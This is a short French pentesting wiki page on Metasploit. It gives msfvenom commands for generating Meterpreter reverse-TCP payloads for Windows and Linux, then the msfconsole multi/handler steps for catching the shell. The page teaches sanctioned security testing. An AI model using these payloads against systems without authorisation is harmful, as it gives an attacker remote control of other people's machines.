# [Exploitation/Réseau] Metasploit

## Introduction

Metasploit est un framework complet pour les pentester. Il est très célèbre et réputé pour sa facilité d'utilisation.

[![image.png](https://wiki.neopipe.fr/uploads/images/gallery/2023-12/scaled-1680-/0Tzimage.png)](https://wiki.neopipe.fr/uploads/images/gallery/2023-12/0Tzimage.png)

## Reverse shell Meterpreter

#### Payload Windows

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> --format=exe > payload.exe
```

#### Payload Linux

```bash
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > payload.elf
```

#### Listener

Après avoir généré le payload, vous devez lancer la console metasploit pour lancer le serveur d'écoute :

```bash
msfconsole
```

Une fois dans la console, il faut indiquer à metasploit que l'on souhaite se rendre dans la catégorie des listener :

```bash
use multi/handler
```

Ensuite, il faut définir le type de payload utilisé :

```
set payload <PAYLOAD>
```

Définir l'adresse IP d'écoute :

```
set LHOST <IP>
```

Définir le port d'écoute :

```
set LPORT <PORT>
```

Démarrer le serveur d'écoute :

```
run
```